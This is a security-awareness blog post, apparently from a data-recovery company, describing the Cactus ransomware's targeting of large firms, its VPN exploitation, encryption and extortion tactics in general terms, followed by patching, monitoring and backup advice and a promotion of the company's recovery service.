The Cactus ransomware, a relatively new player in the cyberthreat arena, is causing growing concern among security experts. This ransomware stands out for its ability to steal data and encrypt files, while employing unique methods to avoid detection. Cactus focuses primarily on large commercial organizations. This targeted approach and its sophisticated evasion method make it particularly dangerous. A better understanding of the threats posed by Cactus Ransomware and its operational tactics, will enable you to develop prevention strategies to guard against such attacks.
The recent emergence and significant impact of Cactus Ransomware
First identified in March 2023, Cactus Ransomware quickly attracted attention due to its unique approach and specific target. Cactus primarily targets large commercial entities, especially those using remote access services. This choice is not insignificant, as these companies often possess sensitive data and are therefore prime targets for cybercriminals.
These organizations are particularly vulnerable to Cactus attacks because of their dependence on potentially insecure networks. Cactus’ exploitation of VPN vulnerabilities enables it to infiltrate these networks and carry out its malicious operations. The threat is made all the more serious by the fact that Cactus does not appear to use a data leakage site, making it difficult to detect its activities.
Cactus’ ability to exploit VPN vulnerabilities and infiltrate networks undetected increases the risk of major disruption and financial loss for affected businesses.
Technical analysis of the Cactus ransomware
It stands out for its use of advanced encryption techniques and its exploitation of VPN vulnerabilities to gain access to its targets’ networks. It uses a batch script and the 7-Zip compression tool to obtain its encryption binary. This technique enables it to slip more easily under the radar of the most common security software.
1. Unique encryption techniques
Cactus Ransomware employs sophisticated encryption methods to protect its binary and avoid detection by antivirus software. It deploys itself via a batch script, then deletes the original ZIP archive. This complex approach makes it difficult for traditional security tools to detect and analyze the ransomware.
2. File extension modifications and encryption process
Once executed, the ransomware changes the file extensions of targeted data from “.CTS0” before encryption to “.CTS1” after encryption. For file encryption, Cactus ransomware uses a unique AES key, known only to the attackers, and needed to decrypt the ransomware configuration file and the RSA public key used to encrypt the files. In addition, it has a fast mode where it encrypts files twice, adding a new extension after each process (.CTS1.CTS7) when run in fast and normal modes.
3. Exploitation of VPN vulnerabilities
Cactus exploits known VPN vulnerabilities to gain initial access to the victim’s network. Using these vulnerabilities, the threat actor gains access to the networks of major commercial organizations. Once initial access has been gained, the attackers use a scheduled task for persistent access and employ an SSH backdoor that they can later reach from a command and control server.
Cactus Ransomware operational tactics
1. Unauthorized access and network infiltration
Cactus ransomware uses unauthorized access techniques to infiltrate corporate networks. By exploiting VPN vulnerabilities, it gains access to target systems without arousing suspicion. Once inside, it spreads laterally, exploiting weaknesses in network security, weak passwords or out-of-date software to take control of several machines. This ability to move discreetly within networks makes it particularly formidable.
2. Using legitimate tools for malicious purposes
Cactus stands out for its use of legitimate tools to carry out its malicious activities. It uses tools such as Rclone and scheduled tasks to establish persistence on infected systems, ensuring that it can continue its operations even after a system reboot. This strategy enables it to remain hidden, making detection and elimination of the ransomware more difficult for IT security teams.
3. Data exfiltration and double extortion tactics
Before encrypting files, Cactus ransomware exfiltrates sensitive data from compromised systems. This stolen data is then used as leverage to further extort victims or to be sold on the dark web. In addition to demanding a ransom for data decryption, cybercriminals threaten to leak or sell the stolen information if the ransom is not paid, a well-known double extortion tactic. This approach increases the pressure on victims and makes security incident management even more complex.
In their latest report, researchers at Kroll Cyber Threat Intelligence have drawn up a diagram to provide a better understanding of the Cactus binary execution process.
Prevention and mitigation strategies
1. Importance of regular patch management
Regular patch management is crucial to protecting networks against ransomware like Cactus ransomware. As Kroll’s analysis shows, Cactus exploits documented vulnerabilities in VPN devices to gain access to networks. Regular system and software updates can prevent such intrusions by correcting known security flaws.
2. Network monitoring and penetration testing
Continuous network monitoring is essential to detect suspicious activity. Regular penetration testing can also help identify vulnerabilities. Effective monitoring can detect suspicious use of these tools and other anomalies, enabling rapid intervention.
3. Recommendations for companies and individuals
For companies:
- Regular updates and patches: Make sure all systems and software are up to date to avoid exploitable vulnerabilities.
- Employee training: Make your staff aware of security risks, including phishing techniques and other social engineering methods.
- Regular backups: Make regular backups and ensure they are stored offline or in a secure environment.
For individuals :
- Security updates: Keep your devices and software up to date to protect against known vulnerabilities.
- Online caution: Be alert to suspicious e-mails and links, and use reliable antivirus solutions.
- Backups: Regularly back up your important data to external disks or secure cloud services.
Cactus Ransomware represents a sophisticated and evolving threat in the cyberthreat landscape. Its ability to exploit VPN vulnerabilities, use legitimate tools for malicious activities, and carry out double extortion attacks makes it a formidable adversary for organizations of all sizes. The best defense against threats like Cactus remains a combination of proactive measures.
For help in the event of an attack, don’t hesitate to consult our data recovery experts. SOS Ransomware can help you restore your files and prevent future Cactus ransomware attacks.
To find out more: a deep dive into Cactus ransomware
SecurityScorecard’s technical analysis of Cactus ransomware
Update 30.01.2024:
Cactus stings again! Schneider Electric is the latest French victim. Explore our latest article to follow the evolution of these cyberattacks closely and stay informed about the persistent threat of Cactus.
